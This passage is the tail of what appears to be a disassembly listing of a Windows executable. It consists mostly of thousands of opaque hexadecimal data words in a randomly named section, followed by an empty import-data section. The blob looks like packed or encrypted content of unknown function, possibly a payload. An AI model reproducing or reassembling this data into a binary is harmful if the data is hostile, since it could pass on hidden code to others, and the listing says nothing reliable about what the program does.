dd 8A3D44C7h, 0D103BBDCh, 323DD364h, 1003BF57h, 6A323543h
dd 24C6410Eh, 9238C942h, 0CD1A63BBh, 2C03DE25h, 0EFB32DB5h
dd 73A2A76Bh, 0D93509A6h, 0C1EE1DD4h, 56B1035Eh, 0C6D3B311h
dd 71FF61ECh, 8708610Eh, 12DC0006h, 0F22F96Ah, 0A0E708DEh
dd 5C1BC627h, 23B2AFDh, 835D719Dh, 680F1A49h, 26702D7h
dd 3F36D83Ch, 26C6ECF0h, 0F74FCF98h, 0DEED6498h, 0FC1E1185h
dd 9E0EC620h, 314147CFh, 0D3E3676Fh, 0B528E096h, 0C172FD29h
dd 0DD0DBDE9h, 51CDA90Dh, 0A8BA846Eh, 0E87DCFC6h, 0E8DD632h
dd 1CEF93E7h, 3BC1EC25h, 1FE49B64h, 23125526h, 1F09DD6Fh
dd 266493B7h, 8436FCC9h, 0B73E7846h, 0BEB5593Fh, 0BDD310Ah
dd 7465919Bh, 0CEB309B1h, 65E91FFFh, 0B6355908h, 97BD429Ch
dd 0CF80C2B1h, 93891D6Ch, 0F3614639h, 0DE0E4ED8h, 371E184Dh
dd 0D60EC658h, 0C558DA30h, 0ED03E236h, 0D748A908h, 0D871E17Bh
dd 76DE21D4h, 0C279DB3Fh, 72EC7115h, 93D5CC9Dh, 0FF58A0D6h
dd 0ADEFB723h, 3610BA96h, 0ECB09048h, 0FF9883A3h, 4DA6E84Fh
dd 0EBB5AC0Bh, 0D1BD01FEh, 0EFE199A3h, 0DBB73739h, 12F5890Dh
dd 0C2B41F8Eh, 0FD417524h, 93CA6EB0h, 0DF67CB27h, 18CFBAB5h
dd 0BC15F783h, 5B07EB3h, 170EEDCBh, 5A5BD2DBh, 2C46C49Fh
dd 1EC69C82h, 84A7C929h, 253023ECh, 0B109B1F7h, 0AA13BFA5h
dd 44979FF6h, 6659EE04h, 0C0EA8C63h, 83312136h, 5D7E4398h
dd 0E9E68825h, 0FD3C8A1Eh, 0B22A0912h, 541E6C62h, 1FC26C98h
dd 9BA973F0h, 62C7371Eh, 6DEF82D7h, 0F60479CDh, 75A52272h
dd 0D6F37D58h, 0B1666548h, 383CB109h, 1BA8A681h, 0C9AF74F8h
dd 5FFC6808h, 734339C4h, 0C05C09A7h, 32DD821Ch, 509AC141h
dd 69BA4341h, 30DEB303h, 0C636C723h, 13A716h, 3E57F0DDh
dd 1772B7DDh, 0A1B69CF4h, 3387140Dh, 0C00C62B7h, 36A38466h
dd 0D3C9AF0Eh, 0DCFE5A4h, 1F5403B6h, 862E076h, 0E6B083Ah
dd 6A68DD10h, 456F490Bh, 7D4A462Eh, 0DD1E5A5h, 430AFC28h
dd 4D6FB116h, 0BE6C87B5h, 10B80CAEh, 0DEC09B54h, 6B76FB10h
dd 0F181047h, 0C1D885C9h, 23D91006h, 0DAF13683h, 6C49BD4Ch
dd 0B577EF20h, 0DFE1D41h, 9EB681F0h, 330F480Dh, 3B16C4EEh
dd 0CBF9C65Fh, 0D6F60DC7h, 0F61F4F03h, 8320C8Ah, 4131B4DFh
dd 27E6036Dh, 0D1098ACDh, 8D05032Ch, 85824419h, 0E8B4AE1Eh
dd 9E4FEE33h, 48DE5517h, 3EC423Bh, 6D7DF59Bh, 9B179F64h
dd 15753A8Ch, 0AFA59B5Bh, 0A5C67126h, 0EE5090A2h, 68B10363h
dd 0C828B218h, 0F7819D6Ch, 0DF68E068h, 63D051BCh, 67596417h
dd 0F65A8BF8h, 3475FAAh, 0B785A9A5h, 9A843AA5h, 0D019B4BBh
dd 9A0CEFC1h, 0B4FD39B8h, 0F4A467D3h, 0ED1ED70Ah, 0B7FB7703h
dd 3270139Ah, 0D8D89FA4h, 8F5F6BF2h, 24ABE995h, 3532B3FFh
dd 1AA5CE94h, 0CE26FE46h, 0A535A47Ah, 1085FBCDh, 8DB5431h
dd 0AD31A3B5h, 0BF7129Eh, 158539A4h, 0EA70C1F2h, 9430C9DDh
dd 0BF65A4B9h, 0A5F26A11h, 0E0B7A935h, 7E750207h, 0DFB0DD0Fh
dd 0A550AA09h, 0A589FFDDh, 1A507933h, 3B77D3F6h, 0F8E5A4E6h
dd 54A9338Ch, 0B5DF22C2h, 0EDA59171h, 46D72262h, 9B5DD2Ch
dd 2289BB08h, 89EC3D9Ch, 0FBF8C23Ah, 0B9F2A527h, 0D987F1Eh
dd 6B0010FBh, 0FB07F96Fh, 0EDA484E5h, 851E18A4h, 0DEDB0C9Bh
dd 0B3777870h, 0C1FB426Ah, 0B11737h, 6F748D5Dh, 0AB49D825h
dd 3D3B13FFh, 0B24E3F3Ch, 3E5FFF9Ch, 6667651Dh, 0BCFFB569h
dd 95680946h, 0FF719471h, 2957CDD9h, 2D5BD1F7h, 5FB5FBFFh
dd 604E5F53h, 1560FF51h, 0C9B806BCh, 5EFF0AC0h, 0F0DE5A1h
dd 0FFD5110Eh, 10316E84h, 0F8F9F7EFh, 8E5CFBFFh, 0D9FA1B58h
dd 2223FF01h, 627A2C25h, 82D1ECC5h, 0FF1B462Dh, 0FAE63089h
dd 0FF168CFFh, 1B61B6E8h, 77671B60h, 0F31521FFh, 0C209C206h
dd 0C97EE156h, 0A27FDFE3h, 0CECFCCCAh, 2F45FF60h, 77EFD1EEh
dd 0AAFFBBB1h, 0BCBA9238h, 0FF43BEBFh, 0A9DEFF37h, 1BF5E69Fh
dd 0EC4283E9h, 0EF477F23h, 10D3F0F1h, 73D066FFh, 0DBD951D2h
dd 42DDFFDAh, 0DC7DBA70h, 85FF833Bh, 5C4F8784h, 0FF4EA7C4h
dd 8E8F8D65h, 0CE06A491h, 3438B1FFh, 7D537967h, 57F8FF39h
dd 5B04C281h, 45FF37A5h, 0A9A6A45Ch, 0FFFF68A8h, 6AB4889h
dd 9293B0AEh, 0D32B26FFh, 98105D32h, 9C9DFF9Ah, 3CDD15A8h
dd 47ADFD07h, 4B01FF2Dh, 4F25BDAFh, 29FF6F61h, 2DECD033h
dd 0ECC4DA37h, 0FF38CC92h, 419FCE64h, 0FF09A6BEh, 716FC730h
dd 0E84A5370h, 1AFDD116h, 0FA2C5AD0h, 0FF30E01Bh, 4A034BFEh
dd 9BFE003h, 0C9B9B3FBh, 1FFF0AB7h, 314E8612h, 0F8EEB8FEh
dd 0FCD2AC0Ch, 0FFD762DFh, 23FF0001h, 0C34078C3h, 0FF2BE0EAh
dd 84B03F9Eh, 30312E2Ch, 11A741FFh, 1B9113D0h, 7571FF2Fh
dd 2B5A441Ch, 0D4FFC278h
dd 0D0C77CE2h, 0FF80F27Ch, 0CCCDCAC8h, 0EC0D4569h, 0AD5A77FFh
dd 0B9B6B7B5h, 0F64EFF53h, 0C09680D9h, 13FF18B4h, 0E0E512E5h
dd 0FF7DEBA1h, 0EC98AB8Bh, 90A2F046h, 0C4D5C5FFh, 0DB5101D5h
dd 3285FFDEh, 0DEDFDCDAh, 0BFFF553Fh, 893FE17Eh, 0FB6367C3h
dd 64AD9F8Dh, 907FFF8Ch, 0B0F10742h, 78E2FF73h, 55F078E5h
dd 7EFF7F7Dh, 0BEF65481h, 0F45E68A1h, 2EFFCA8h, 0B4DB46Fh
dd 0DFB0FFDCh, 960CAAB0h, 10FF45AAh, 8E5329Bh, 0FF9E0A5Dh
dd 5745FBE2h, 0A344FF65h, 0A44A00F8h, 0CD5F2413h, 851286Eh
dd 0A127F3D1h, 0F67C7CEBh, 0B503B12h, 0A70BF30Ch, 5F7FF65h
dd 9FB691Fh, 0FFFF6DC3h, 6571C70Dh, 0F01F3181h, 0B955CC52h
dd 0FF35FFBFh, 0FF5CC81Bh, 1260B6h, 241604BAh, 7F06C4A1h
dd 0E46708E3h, 2EF8200Eh, 0C558F2E8h, 0F1F77D97h, 61E0FBFFh
dd 0D6FCEBBBh, 0DB5AFFFFh, 26DC8C00h, 674B1960h, 84E8E3FEh
dd 137FA12Dh, 178D075Dh, 0FFB7BBE9h, 1FFF7505h, 1E7992F9h
dd 0FFC47A17h, 7284E4D6h, 0A4C8A3C9h, 28CEA4FFh, 12D1A813h
dd 89B7E1ADh, 367EFFD7h, 19BA9590h, 0E072FFDFh, 1EFFE39Ah
dd 897BE99Fh, 0FFC7E843h, 8E80EE44h, 0C9E6D248h, 0A8D64CFFh
dd 0EED95076h, 0BDDAFF35h, 0BB29E036h, 9AFF833Ah, 40863945h
dd 0FFE0DE8Ah, 69E88D64h, 6D338773h, 114977FFh, 52786737h
dd 3D90FF7Bh, 81587E68h, 0A7FF5D2Ch, 0AB614739h, 0FF058285h
dd 94089AFh, 0D336593h, 0E9192FFh, 0F2386A98h, 5DA6FF9Bh
dd 42F89E08h, 0FCFF6254h, 60A8046h, 0FF254BF7h, 5026A94Ah
dd 342A7002h, 0A5406CBh, 3C1258FFh, 3F165C0Eh, 401BFF34h
dd 2661C39h, 6AFF204Ch, 1A2A2D27h, 0FF6EC96Fh, 2654CA67h
dd 6C57CEF4h, 2FFBB12h, 0B95FCA1Ah, 0FF6F575Eh, 0FFBEE63Eh
dd 0E20C6208h, 0E62C1E0Ch, 30C210FFh, 14C6F4EAh, 0CF7FFEEh
dd 84CFFDD3h, 0FEE2EABDh, 4E5622D8h, 0C6B8E5FFh, 22CABCCBh
dd 92E89FFh, 8F1584F0h, 802DFC19h, 8CF71D73h, 7BE7FF77h
dd 7CFFFF20h, 0CB8100C5h, 0A5FAEBDDh, 0A9EFE1CFh, 8DD3B336h
dd 0AEB4FF22h, 0BD93CCB7h, 97ABDD8Fh, 81E1700Ch, 0E59CC12Fh
dd 99A7FFBAh, 0ED98A8E8h, 0A3FFF147h, 0E9F04B91h, 0BEAD54Ch
dd 7BFFADFFh, 7FB1DF35h, 0FFBDDE39h, 28D8843Ah, 0A89A883Eh
dd 0E68B62FFh, 0C6859167h, 4775FE6Bh, 4B796F95h, 0AFF3499h
dd 0AFF357Bh, 5BFF3789h, 0A45FFFD7h, 3CAA6001h, 0ADFF044Ah
dd 0B0036FE7h, 0B38E940Ah, 0F2F8FFFEh, 0EED6A1F7h, 5B49FF47h
dd 482369FFh, 0D34D24A1h, 4C5CFF1Eh, 99807B81h, 87FF7542h
dd 62887947h, 0FFAC5E8Ch, 5042B066h, 17EEB46Ah, 0C6B86EC2h
dd 4EBC12F0h, 72A011BFh, 0FEA31A40h, 1EA41FB8h, 0DF7CAA00h
dd 4E60AE51h, 6452FF08h, 1E550C72h, 0AFFF5B31h, 535A35FEh
dd 0FF124036h, 58443A60h, 86AEBF21h, 0D2518885h, 0FF51014Fh
dd 2D29AD73h, 0FF2E4B72h, 0D2180A78h, 7CD7307Bh, 62D85BFFh
dd 65DC705Ch, 66C1FF7Ah, 6DDA28E8h, 10FFC62Fh, 14CA52B9h
dd 0EACE3426h, 0DFF3F617h, 1CF7B781h, 2F8FF11h, 6FCC416h
dd 0E0F126D8h, 0B2C6250Ah, 32FFC051h, 36ECD2C4h, 90FF0F0Ah
dd 9491F73Ah, 0FF03E73Eh, 0C2F42298h, 0C6F8269Ch, 0C52980E2h
dd 0C3B3C708h, 0A0180160h, 6A3C50h, 70DA4068h, 322A3EE8h
dd 642EFFD3h, 43006C6Ch, 68F94FC2h, 0A38743FEh, 0AD47AAC4h
dd 4E79FFA1h, 0D125753h, 33FA4531h, 0FFDAEF68h, 2458728Ch
dd 748B46FEh, 8B4D3E96h, 0FFFFBC59h, 0CD1B858Dh, 0C9FFA8FFh
dd 5D92415Ah, 0BEAA1E29h, 0ED41F32h, 77C42365h, 220CC3EDh
dd 9DB2C291h, 8B626231h, 1B010936h, 2F01A3C3h, 151BCEBBh
dd 376F0801h, 7255345Ah, 16DE674Eh, 0A1B0802Ah, 0D0FF2705h
dd 146B4901h, 0FE59E87Dh, 1495F2B0h, 2B536F94h, 5250C0C0h
dd 544F4005h, 48015050h, 4A395408h, 6CAD0A10h, 0B030FC66h
dd 0B9ACA08h, 1C468D4h, 0D17D39ADh, 95550087h, 0D56453E7h
dd 0FE1130A1h, 67880F47h, 0AB8DCA01h, 0C408BE0h, 0D202C29h
dd 282967C0h, 6083AF22h, 0E90020FBh, 801E0237h, 48502C52h
dd 708271D8h, 0DB1676EBh, 0B65513F8h, 26C03F3h, 4E9B4558h
dd 4CC92224h, 0FAF33B84h, 8A5C001Ah, 966F0817h, 70DC380Fh
dd 72491B2Eh, 63BD846Ah, 0B32BB31Ah, 0F7F80D74h, 440D1256h
dd 17F416DEh, 0F27F053h, 90144C89h, 0D5834799h, 0BE05087Ah
dd 0DC66h, 0A3920200h, 528BF820h, 9F480A04h, 6283ED21h
dd 0C7894150h, 8051C1FEh, 0EC0CB155h, 8BABCB6h, 0B6A9A81Fh
dd 0FD0A61BBh, 0AABDBABBh, 0AD0C8FB8h, 8DFF8B89h, 8D9A9C9Eh
dd 0B6899ABBh, 0CFCF0696h, 0EAB8BA13h, 9BBA7A9h, 16600398h
dd 0B1B0B2F2h, 0FFEA0B4Bh, 92984E5Fh, 0BCFF9190h, 8C8C9E93h
dd 0D996B9FFh, 3F0C9A93h, 949C8AACh, 0D99AC9B2h, 0B6AFBEFBh
dd 967F18B2h, 0DF8D908Bh, 0DF86FBBDh, 0A9790ADh, 0FF9D9E7Dh
dd 173ADABh, 969EB2FBh, 6D17B991h, 0B6F60D92h, 0BA89E9Bh
dd 88909BFDh, 0E624FFFFh, 0E45FD204h, 12890850h, 28DDF769h
dd 0E817F627h, 5A473847h, 0DD488393h, 0F406160Bh, 9050036Ah
dd 68EA16DCh, 89D64856h, 7DD02702h, 50B7250Ch, 0C10595h
dd 44101200h, 4616F60Fh, 1B7E80D2h, 898B75E0h, 6A2F0A17h
dd 607C160Ah, 87221C89h, 0A5033E80h, 0FFFC6878h, 214822FFh
dd 24AE828Bh, 0A095881Ch, 0A1D8900h, 80E8370Dh, 0E0FF7Fh
dd 23899A75h, 0B75B8C22h, 97190456h, 68A22305h, 8599CF9Dh
dd 2E00Eh, 9C8900h, 2DA04809h, 0FF6DF092h, 9544FFFFh, 0C4901634h
dd 453612C1h, 0A8C7465Ah, 3A241144h, 48E9FD51h, 23FFFFF2h
dd 0A1763CFh, 0EB5D6570h, 0E9AFF011h, 48FF167h, 0A8697D56h
dd 74501E37h, 4902509Ah, 7856582Eh, 872C2FE6h, 5B1D53B1h
dd 14D3369Dh, 37917278h, 15FE65C1h, 4F6573F6h, 4F56F1Bh
dd 0F13D40C3h, 50139D0Bh, 65E09D24h, 0E4C58A09h, 29942701h
dd 360B72B9h, 0C755C86Fh, 7250F3Fh, 0B39DB1F0h, 0C8B3398Ah
dd 975CB206h, 9D8E40C1h, 0D70C20CDh, 8600F63Dh, 7328FB73h
dd 4BAEAC21h, 0CD805DEAh, 3F241476h, 6E1103AEh, 0C1C7D390h
dd 106A8A49h, 9E40C1A7h, 0CEA3F627h, 40AE90Ah, 281FB85Fh
dd 103DA310h, 0F76CFB8Ch, 0D8091400h, 3D2B140Fh, 83F0C121h
dd 20530BDh, 472A12C3h, 0B0F7C1B2h, 73BA1200h, 2DAE25ABh
dd 489B637Ah, 27ACC7A0h, 482290B8h, 6A828342h, 818CDE58h
dd 3B1281BDh, 50505E50h, 319208h, 7855FF78h, 8B224822h
dd 0ABAB588Ah, 0C3610720h, 401067E0h, 0A905206Fh, 64F1CEC3h
dd 0B6EE808Dh, 0F9053A47h, 758E91DCh, 1D23B97Fh, 0B62005EBh
dd 5F0C1D12h, 0DC954E2Eh, 748E116Fh, 523E4ACh, 780D7F39h
dd 8DEEC148h, 122E89BBh, 1149BB05h, 5CED6805h, 0B105420Ah
dd 88CD0A66h, 0C239119h, 95057677h, 0CD0A6413h, 4F6F12E8h
dd 97266A02h, 0DA1D635Fh, 0EF058B09h, 44051642h, 0A9176314h
dd 41BD54EDh, 2475F611h, 0FE05EA2Ch, 0D45848EBh, 17CFB805h
dd 4BDBF154h, 0ED231192h, 5CF5161h, 0A2C247FEh, 1621059Eh
dd 68C052FBh, 2216BCF6h, 89F1C23Eh, 841CDF3Eh, 6BEB3D45h
dd 7A7E5605h, 16E505D6h, 0CE4696C9h, 7B6C96B2h, 4B8770Ah
dd 17806C8Bh, 0B787D38h, 32AE7280h, 5D9B537h, 5B337DDh
dd 35178FAFh, 0E4A17D50h, 10B66EADh, 0F5057FB7h, 0FF67F6ACh
dd 393AEC05h
dd 0F7AE00C0h, 1D340B0Ah, 467C70FDh, 0D69B8D9Dh, 0F905C41Bh
dd 89FECF59h, 0FD9EB37Fh, 0BF4E0513h, 3272818h, 0C7186636h
dd 0DA119D4Bh, 0EB45EF06h, 7F055B1Bh, 0B627FB3Dh, 18BF6C05h
dd 0FF443D40h, 8DE609D1h, 6C4FF6BFh, 0EC0571B7h, 0E2D8CB9Fh
dd 0B13FFDD9h, 195005C5h, 0FE3D35FFh, 6F859FE2h, 8B627F11h
dd 0BF05D3B5h, 5A71662h, 35631962h, 1ECBEDBDh, 89F611B9h
dd 5534E2Dh, 0A69C51B7h, 7651056Bh, 0DFB74D38h, 0DB257619h
dd 0BA0541B9h, 0EDFC4067h, 1CF1481Fh, 0AE5A2775h, 0B4EC2705h
dd 6122C805h, 0D5EC1388h, 919C670Ah, 69BCCDDEh, 1E1122F3h
dd 0F819F8C8h, 233E0499h, 94D3185Fh, 56EF456h, 0D0A529A7h
dd 1A2705ECh, 0E2CC7DD2h, 0CCADF917h, 57A2DB53h, 69FC4D05h
dd 6405AF45h, 0E11E241Ah, 26001AC6h, 0BE0AE1DEh, 7FA6352Eh
dd 0B633DFE3h, 0F65E8AD2h, 1AE405EDh, 0BF237D9Bh, 5595AD21h
dd 59F6ADAh, 3ED555DFh, 1BB2D905h, 1BE477BEh, 0E23DFD34h
dd 0AD6346B2h, 0FBF6601Ch, 1CF2059Ch, 0D8ADB437h, 0C8CF0AFFh
dd 0B81CB208h, 6F0A4B6Ch, 72B17DFFh, 100CD0Ah, 7CF02394h
dd 0E097A22Bh, 0F2931CB1h, 138C6195h, 0EC737FB7h, 1D6905EFh
dd 0A1DF811h, 5FB138C7h, 0C739F6C3h, 7305DD4Eh, 0FFF60611h
dd 8ED09815h, 0BD006ECh, 0DF9348E7h, 1E2BF49Fh, 0F6358E0Fh
dd 24AEB1A0h, 639CF647h, 0B6DC3BA7h, 0B6B2DF3Ah, 0F79D8E73h
dd 1E4505C6h, 0B08E670h, 7B1E51D9h, 6F155B36h, 1EB9D89Ch
dd 0D264E64Ah, 9E0BCAB3h, 22C6D780h, 0E038F990h, 0AC6F52Eh
dd 0FE15F9A8h, 81F1E2Fh, 6F09F8A4h, 9E560B31h, 0FC5AED74h
dd 8D3BFE05h, 9D05F8B5h, 0D9AFF1Fh, 0A5A85771h, 1AE1A504h
dd 7EC2F16Bh, 0E2D63489h, 6905DC47h, 50F5BACh, 402001DFh
dd 0C4B7ED0h, 23CF4920h, 0C8F60D20h, 27828C21h, 0D49143B7h
dd 0A338056Bh, 175875A9h, 545CE6B7h, 0BBDA64B5h, 5DEA43Dh
dd 491F8B7Fh, 677105BDh, 30ED9617h, 7511790Ah, 5BCD710h
dd 6E7A923Fh, 11208008h, 57FBF616h, 0F61108A9h, 7B5EF524h
dd 0EA48B6FDh, 5AD46BDh, 0AA7BB651h, 61DEFB3h, 8650F881h
dd 0BDB901CDh, 0E05D770Bh, 4BB57284h, 0A01CC3B7h, 6F8ECA6Ch
dd 0D59299FCh, 0A210CF7h, 910A78E6h, 0C24C344h, 9E0AB14Ah
dd 34466F30h, 0DC838279h, 54E8E27Bh, 7B5B71A3h, 55CEEEDh
dd 354D1187h, 181CE35Ch, 635B4D52h, 53DB773h, 0E7CB691Ah
dd 0D2E3357Ah, 586BF5CEh, 0F948CF3Ah, 3E4C0A63h, 71C92246h
dd 362281C9h, 6C330AA9h, 60CFC3C8h, 3E5423DAh, 36C52324h
dd 2C2F0AF2h, 0A616CBEh, 0F6F32461h, 4D57237Eh, 0B40A97A9h
dd 0B1BC3122h, 2DD30AFFh, 464053Ah, 7D3C7B24h, 0BF7CC96Ah
dd 0B7D78F5Ch, 762E1149h, 1BA89CF1h, 3DA6BEA2h, 0DF0D735Eh
dd 0E6BC7A05h, 78F52F1Ah, 535ECCDh, 3D7C1D7Ch, 2DC96E4Ch
dd 10D6BFBFh, 0F1F905A4h, 7D486B9Ah, 90D735E3h, 5824DCB7h
dd 49AA0DFh, 3D702592h, 63AB8F25h, 36028289h, 7032B6DDh
dd 0AD32056Bh, 327705E1h, 635505C2h, 337DCC28h, 0E40A8C7Ch
dd 0F0339EF2h, 33A3B4C8h, 23CA0A5Dh, 8BF23C0Ch, 26001DD9h
dd 70246A93h, 25E2DE0Ah, 2A6BD1DCh, 0E4D8390Bh, 93D4E730h
dd 3CD09E36h, 4279CC4Eh, 7CE6C439h, 0DB96F21Dh, 80FEFD77h
dd 0C16E14F6h, 29FE0550h, 5A182DCh, 406AC786h, 0A3390DD3h
dd 26EF2681h, 0C12DCFBBh, 0E385DB30h, 30ED5B27h, 0E0050994h
dd 5B2860B7h, 1B22C5A3h, 0E2EC2D50h, 12A0770Ah, 2A47692Dh
dd 0A131B9Dh, 914DC7A6h, 0E8727D90h, 94250B8Eh, 8F2CE77Dh
dd 10ED9050h, 0A17B1603h, 59F104Ch, 2099437Ah, 2D4BBEDDh
dd 4469178Fh, 1198B78Bh, 7CDB4132h, 0FD650522h, 544F882h
dd 52F32DE7h, 2EE7E428h, 0F1D93BD7h, 529CDF0Bh, 980B67FBh
dd 462F163Eh, 1D23FBCCh, 0F1F8390Bh, 0A68D3035h, 7646D730h
dd 0F077260Ah, 0D65B8B9Bh, 0DA61A7ADh, 0D05B8A2h, 7144F6FBh
dd 3B228B05h, 0B1D2C52Ah, 1E24309Fh, 383132ECh, 63B57F5Fh
dd 437E640Ah, 0AFB3209h, 0A3F61568h, 0F730B832h, 0B2F5AD51h
dd 571448F6h, 91F8055Dh, 95BAAE28h, 0C17D2AAh, 6CCA8CFBh
dd 5E5B115Ah, 0D6A581D5h, 17563461h, 3549EC34h, 0B2A06F9Ah
dd 16355CDFh, 9896DB80h, 0A63F405h, 58EBB67h, 0AF583605h
dd 366B2CBFh, 0BD080C23h, 0F0BE0BB3h, 22C693D3h, 370F7DC8h
dd 0BAEF0124h, 0E8BC0A3Ch, 8EFF0015h, 6A60C35Dh, 0B41F5004h
dd 44E0D168h, 0A502D230h, 0E897D15Dh, 468D160Ah, 81FB75FDh
dd 0D089CEEh, 93A2BB6Bh, 17F4D78Eh, 11168B47h, 2C6DEBFh
dd 0E0C78BE9h, 0DF83C22Bh, 14289AAh, 4606FF8Ah, 83C8B60Fh
dd 0C1FF03E0h, 0A5F302E9h, 0BBF3C88Bh, 0D00311A4h, 0E907C6FEh
dd 0EA83D72Bh, 15721DFh, 0BB0BC783h, 8EC38B75h, 2B664D7Fh
dd 42AAF3CFh, 2EBED10h, 4BF2F4EAh, 173700B8h, 0BFD3F7F2h
dd 0E3C182B9h, 0BF214F4h, 0FD1212C1h, 6268F3D8h, 0BC72A01h
dd 5E137E14h, 0A8DE8BF2h, 38BEC09Fh, 0BF108AD4h, 0F781E886h
dd 8442A8FAh, 47F697A0h, 17FEBF2Bh, 3741D78Bh, 405FFD98h
dd 7F8D3C41h, 0AAF37F4Bh, 0EA69294Eh, 6657EBC6h, 756C7A02h
dd 987909C2h, 58B1FF1Ch, 5A05F259h, 0CAF4D270h, 0FF818DBCh
dd 0C86B0CAFh, 17056851h, 4B0CF1DDh, 745EBBAFh, 2BD8F2CAh
dd 41F427F7h, 0FCBA5920h, 4C0B22F4h, 6F77DB5Bh, 168AC9D5h
dd 0F7540473h, 7F2BD32Ah, 0EA80F21Dh, 0DBCA1347h, 75C1688h
dd 0A246F3DBh, 4B02FFC0h, 76E981F3h, 0ECF68956h, 3FDB0BF3h
dd 0A52A5538h, 0B225FDD9h, 13F2C475h, 0FFC1374Bh, 0F76907E6h
dd 0B5918DBCh, 31B768F5h, 54BD01B2h, 0D65BC8C6h, 0F70D1844h
dd 7476F001h, 0F25A647Fh, 33F3F63Bh, 0F623DAFFh, 0BD0E68F2h
dd 0BD93B7F7h, 4FB7F35Ah, 0FF4FA0FDh, 0F2F26C08h, 580AF683h
dd 0FE87F3FBh, 78C303F2h, 8F96E681h, 8A846CDFh, 90E8AF02h
dd 6FDD2F7Bh, 0A156F776h, 0FD73DFB1h, 805EAB56h, 92B52AC1h
dd 1C7745A1h, 6343F3DFh, 4DED9B14h, 850D485Fh, 0C0B653F4h
dd 0DF827105h, 0BE75F087h, 0F28BC3F3h, 0C9266079h, 0D960AB12h
dd 0C0009D13h, 93921A88h, 909203ECh, 0
dd 0FF1200h, 1BAh dup(0)
_kSjx934 ends
; Section 6. (virtual address 00040000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00040000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 440000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start